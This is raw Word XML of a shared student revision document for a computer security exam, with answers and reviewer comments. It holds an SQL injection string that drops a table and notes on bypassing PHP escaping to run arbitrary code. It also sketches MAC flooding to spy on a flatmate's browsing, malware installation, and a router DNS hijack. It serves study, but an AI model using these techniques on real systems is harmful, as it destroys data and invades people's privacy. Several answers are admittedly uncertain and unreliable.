          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="404C9D4D" w14:textId="116A6C42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The output I’ve got is</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="5D9861ED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="297233D5" w:rsidP="61D57FC2" w:rsidRDefault="297233D5" w14:paraId="0603D5E2" w14:textId="17DCCC30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ||| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''; DROP TABLE EXAMS; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="16E03419">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48BF0D33" w:rsidP="61D57FC2" w:rsidRDefault="48BF0D33" w14:paraId="0F745AD6" w14:textId="50319AD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>If the above is still not correct, then I don’t know what the valid answer is...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB29DE" w:rsidRDefault="33CC9603" w14:paraId="2C078E63" w14:textId="325ECF85">
      <w:bookmarkStart w:name="_GoBack" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="33CC9603" w:rsidP="499DF1D5" w:rsidRDefault="5C219BEB" w14:paraId="3CAE69D5" w14:textId="072ABE29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ai) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Network Address Translation: </w:t>
      </w:r>
      <w:r w:rsidR="69CC16F5">
        <w:t>When a PC makes a request out to the Internet, it's directed to the router/firewall. The router/firewall changes the source IP address of the packets to its public IP address, notes the connection request in its memory, and sends them on their way on the Internet. When a response is received, the router looks up the connection in its memory, and this time changes the destination address from the public IP to the local IP of the machine which initiated communications. It then sends the packet on its way on the inside network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3DECFEF2" w:rsidP="61D57FC2" w:rsidRDefault="3DECFEF2" w14:paraId="481FE616" w14:textId="7A88CDFF">
      <w:r>
        <w:t xml:space="preserve">This is done using ports NAPT/PAT on most modern home </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>systems</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="5291C250" w:rsidP="1799B02E" w:rsidRDefault="5291C250" w14:paraId="0BFEA13E" w14:textId="74D32DA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1799B02E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1799B02E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="48FB34F3" w:rsidP="499DF1D5" w:rsidRDefault="48FB34F3" w14:paraId="4E99AC1A" w14:textId="7B661FF7">
      <w:r>
        <w:t xml:space="preserve">Sniff the network in promiscuous mode, you can view all HTTP packets as they are not encrypted. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> one of the tutorials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="499DF1D5" w:rsidP="499DF1D5" w:rsidRDefault="499DF1D5" w14:paraId="4D33A8E8" w14:textId="06F5C7D2"/>
    <w:p w:rsidR="5291C250" w:rsidP="499DF1D5" w:rsidRDefault="5291C250" w14:paraId="444DF66D" w14:textId="5CD0EAAC">
      <w:r>
        <w:t xml:space="preserve">Maybe use MAC Flooding to force the router into fail-safe mode, so it essentially served as a hub by sending all its incoming packet to all ports. Thus, the attacker (I.e., another </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flatmate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that are connected to the same LAN) can also receive data packets intended for victim’s ma</w:t>
      </w:r>
      <w:r w:rsidR="1D7FA228">
        <w:t>chine, and know which sites the victim is browsing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D7FA228" w:rsidP="499DF1D5" w:rsidRDefault="1D7FA228" w14:paraId="3080F84D" w14:textId="69E2C80A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aiii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54BFFD77" w:rsidP="499DF1D5" w:rsidRDefault="54BFFD77" w14:paraId="4562C4EC" w14:textId="3B1DD1F5">
      <w:r>
        <w:t xml:space="preserve">You need to intercept the session key used in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flatmates’</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTPS sessions in order to decrypt their packets and view the sites they are visiting. By default it would not be possible to know these sites as the packet contents are encrypted. At most you could view the destination IP of the packets and </w:t>
      </w:r>
      <w:r w:rsidR="5116CD0E">
        <w:t>do a reverse DNS lookup to know the domain they are visiting, but not the exact URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="499DF1D5" w:rsidP="499DF1D5" w:rsidRDefault="499DF1D5" w14:paraId="1CE63C81" w14:textId="102FB92D"/>
    <w:p w:rsidR="1D7FA228" w:rsidP="499DF1D5" w:rsidRDefault="1D7FA228" w14:paraId="6FBF7412" w14:textId="2000024E">
      <w:r>
        <w:t xml:space="preserve">(Not sure if it’s correct or not) Send phishing email / install rootkit / malware to victim’s computer (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mebroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as discussed in the </w:t>
      </w:r>
      <w:r w:rsidR="4974F64F">
        <w:t xml:space="preserve">CW paper). The malware such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4974F64F">
        <w:t>Torpig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4974F64F">
        <w:t xml:space="preserve"> can intercept and steal data even before the HTTPS connection is established, so that victim’s browsing history can be exposed to another </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4974F64F">
        <w:t>flatmate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4974F64F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4974F64F" w:rsidP="499DF1D5" w:rsidRDefault="4974F64F" w14:paraId="11F1155A" w14:textId="6D2836A9">
      <w:r>
        <w:t>If the victim is security-conscious and very well-trained against phishing / Advanced Persistent Attack, he/she might not fall for this types of trick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B82BAEB" w:rsidP="75FE2C14" w:rsidRDefault="5082E5ED" w14:paraId="4854ECD8" w14:textId="2FBEA410">
      <w:commentRangeStart w:id="15"/>
      <w:r>
        <w:t xml:space="preserve">Would it not be just that you can see the websites being visited if promiscuous mode is on? If it is not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> would not be able to see the http request being made through the NAT. With HTTPS the packets are encrypted,</w:t>
      </w:r>
      <w:r w:rsidR="44DBB824">
        <w:t xml:space="preserve"> but domain (aka </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="44DBB824">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="44DBB824">
        <w:t xml:space="preserve"> of destination is not)</w:t>
      </w:r>
      <w:commentRangeEnd w:id="15"/>
      <w:r w:rsidR="3B82BAEB">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="15"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3FC5858A" w:rsidP="133B6B4D" w:rsidRDefault="3FC5858A" w14:paraId="1967E8FD" w14:textId="3E1E365A">
      <w:r>
        <w:t xml:space="preserve">I agree with that last sentence, the other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flatmate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can find the domain (but not URL) and this is “finding out their browsing” (otherwise the question just doesn’t really make sense)</w:t>
      </w:r>
      <w:r w:rsidR="359F2B5E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="359F2B5E" w:rsidP="133B6B4D" w:rsidRDefault="1F9514A3" w14:paraId="7BA3B51E" w14:textId="26D3D863">
      <w:r>
        <w:t>It’s not possible to find out another's browsing with IPsec ESP Tunnel Mode (i.e. VPN).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="556ED1D8" w:rsidP="61D57FC2" w:rsidRDefault="28B17D05" w14:paraId="58BF69B2" w14:textId="414E4593">
      <w:commentRangeStart w:id="16"/>
      <w:commentRangeStart w:id="17"/>
      <w:r>
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:r w:rsidR="7D26C112">
        <w:t>TLS communication with the website’s server (&lt; TLS 1.3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="556ED1D8">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uses only SNI, the request being sent contains an unencrypted domain name so that can be read. If the </w:t>
      </w:r>
      <w:r w:rsidR="1B21AC96">
        <w:t xml:space="preserve">communication is over TLS 1.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="5CB5D149">
        <w:t>tilising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ESNI, this is encrypted during the TLS handshake so the domain name is not visible.</w:t>
      </w:r>
      <w:commentRangeEnd w:id="16"/>
      <w:r w:rsidR="556ED1D8">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="16"/>
      </w:r>
      <w:commentRangeEnd w:id="17"/>
      <w:r w:rsidR="556ED1D8">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="17"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4974F64F" w:rsidP="499DF1D5" w:rsidRDefault="4974F64F" w14:paraId="6CB7B8B5" w14:textId="4AC357A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I believe the correct answer should use CSRF attack followed by a DNS hijacking attack, so that the victim will be tricked into browsing a spoofed HTTP website. </w:t>
      </w:r>
      <w:r w:rsidR="3EA32897">
        <w:t>Steps are discussed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3EA32897" w:rsidP="499DF1D5" w:rsidRDefault="3EA32897" w14:paraId="51DFDAED" w14:textId="6918CBD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1) M</w:t>
      </w:r>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>odify the settings on home routers, potentially via cross-site request forgery (CSRF) web-based attacks, so that the attacker use rogue DNS servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3EA32897" w:rsidP="499DF1D5" w:rsidRDefault="3EA32897" w14:paraId="7D4DD474" w14:textId="3199F3CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>2) When visiting a compromised site, the victim is unknowingly redirected to a router exploit kit landing page, which is usually opened in a new window or tab, initiating the attack on the router automatically, without user interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="499DF1D5" w:rsidP="499DF1D5" w:rsidRDefault="70760F4D" w14:paraId="6808F35F" w14:textId="4A544ED4">
      <w:r>
        <w:t>Counter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="499DF1D5" w:rsidP="499DF1D5" w:rsidRDefault="4DF51E34" w14:paraId="12D38642" w14:textId="485105C0">
      <w:r>
        <w:t xml:space="preserve">measures: DNSSEC / IDS? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="61D57FC2" w:rsidP="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="5FA1CBF3" w14:textId="5624FC2C"/>
    <w:p w:rsidR="588C9FC1" w:rsidP="61D57FC2" w:rsidRDefault="588C9FC1" w14:paraId="1BD11E8B" w14:textId="3AE7C8A5">
      <w:r>
        <w:t>4b:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="588C9FC1" w:rsidP="61D57FC2" w:rsidRDefault="588C9FC1" w14:paraId="40AD563E" w14:textId="6EA5B319">
      <w:r>
        <w:t xml:space="preserve">From what I remember it involved decrypting some string in order to find a post command attack on some router, which was as far as most people </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>got</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="588C9FC1" w:rsidP="61D57FC2" w:rsidRDefault="50615B4B" w14:paraId="08C39730" w14:textId="4C26BACA">
      <w:r>
        <w:t>To sum up our feelings after this q last year:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="588C9FC1" w:rsidP="61D57FC2" w:rsidRDefault="588C9FC1" w14:paraId="70A62B9F" w14:textId="726E1DA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2418AC35" wp14:editId="36CAEA09">
            <wp:extent cx="2466975" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196050345" name="Picture 19605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514350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="588C9FC1">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A" w:author="Shibu, Abhinand" w:date="2023-03-22T17:40:00Z" w:id="0">
    <w:p w:rsidR="1799B02E" w:rsidRDefault="1799B02E" w14:paraId="7E7AAFD3" w14:textId="4FDF48B3">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>This is incorrect, I put it in my coursework and Sergio said that it was defensive registration by microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="AL" w:author="Aldous, Louis" w:date="2023-03-23T00:34:00Z" w:id="1">
    <w:p w:rsidR="00B13CFE" w:rsidP="00B13CFE" w:rsidRDefault="00B13CFE" w14:paraId="12F4AE51" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>+1 if you check whois then it says that this is registered by Microsoft</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="BC" w:author="Biberea, Calin" w:date="2021-03-17T19:23:00Z" w:id="2">
    <w:p w:rsidR="133B6B4D" w:rsidRDefault="133B6B4D" w14:paraId="796A51D6" w14:textId="47190067">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I think this is path traversal, not file inclusion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="133B6B4D" w:rsidRDefault="133B6B4D" w14:paraId="73DB5AB4" w14:textId="7D1D6C7A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="133B6B4D" w:rsidRDefault="133B6B4D" w14:paraId="0777141C" w14:textId="3C1C700C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>I though file inclusion was including a file from somewhere else *using a url*</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="HR" w:author="Hatout, Rayan" w:date="2021-03-17T18:13:00Z" w:id="3">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="0C91E6CC" w14:textId="1D808FC9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="GX" w:author="Guisset, Noe B X" w:date="2021-03-16T15:37:00Z" w:id="4">
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="5BC5916D" w14:textId="0F7B6DFF">
      <w:r>
        <w:t>idk he seems to say that the exploit needs to come from the input $condition which does not really directly interact with quoteInto()</w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="BC" w:author="Biberea, Calin" w:date="2021-03-16T17:48:00Z" w:id="5">
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="2A79828C" w14:textId="59ADD806">
      <w:r>
        <w:t xml:space="preserve">The value of the condition (i.e. condition =&gt; value) will get inserted using quoteInto() </w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="PB" w:author="Parker-Jervis, Clovis B" w:date="2021-03-17T17:16:00Z" w:id="6">
    <w:p w:rsidR="133B6B4D" w:rsidRDefault="133B6B4D" w14:paraId="6B16C5F3" w14:textId="6300C3B8">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I agree with Calin, line 108 `quoteInto` can receive untrusted input. However </w:t>
      </w:r>
      <w:hyperlink r:id="rId1">
        <w:r w:rsidRPr="133B6B4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/21581387/after-using-quoteinto-am-i-safe-from-sql-injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> seems to suggest this isn't the way to go :(  (Haven't explored it fully though)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="BC" w:author="Biberea, Calin" w:date="2021-03-16T17:51:00Z" w:id="7">
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="72C03321" w14:textId="351C4467">
      <w:r>
        <w:t xml:space="preserve">I considered this. </w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="39689FE1" w14:textId="42B7A388"/>
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="1D9818AD" w14:textId="0D689FF6">
      <w:r>
        <w:t>My issue is that that still gets run throuh prepareCondition which escapes stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="744AFBA1" w14:textId="77079A71"/>
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="107CE9F4" w14:textId="586AA244">
      <w:r>
        <w:t xml:space="preserve">If we use something not defined ("blablabla" -&gt; something) it will be treated as a string (using eq I think, the else form isarray check) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="35FB9EA4" w14:textId="622F859A"/>
    <w:p w:rsidR="75FE2C14" w:rsidRDefault="75FE2C14" w14:paraId="3398712C" w14:textId="7056C394">
      <w:r>
        <w:t>Not sure if there is a way to bypass that eq check</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="GM" w:author="Graczyk, Maksymilian" w:date="2021-03-17T21:32:00Z" w:id="8">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="12EE61AD" w14:textId="42980B90">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This may actually work. You can define anonymous classes in PHP: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r w:rsidRPr="61D57FC2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.php.net/manual/en/language.oop5.anonymous.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="6D63E510" w14:textId="514E0D3D">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="7247779E" w14:textId="46B317EE">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>I've managed to use this to execute an arbitrary code when casting to string. The real challenge though is using that for returning a vulnerable query.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="GM" w:author="Graczyk, Maksymilian" w:date="2021-03-17T21:57:00Z" w:id="9">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="498DB652" w14:textId="43D1F8EA">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>I think I've got it working, see my answer below. I hope it's correct :)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="PB" w:author="Parker-Jervis, Clovis B" w:date="2021-03-17T21:12:00Z" w:id="10">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="031BF077" w14:textId="6B85E650">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>I've tried it, and DROP TABLES doesn't come through I'm afraid.  I don't think this is going to work, as when $field is passed to the func, the arg becomes a local to that function, overriding the global which you've defined in the injection code. So $field stays as it was before. Not sure  this is the way to go tbh - but if you can find a way to override that local maybe......</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
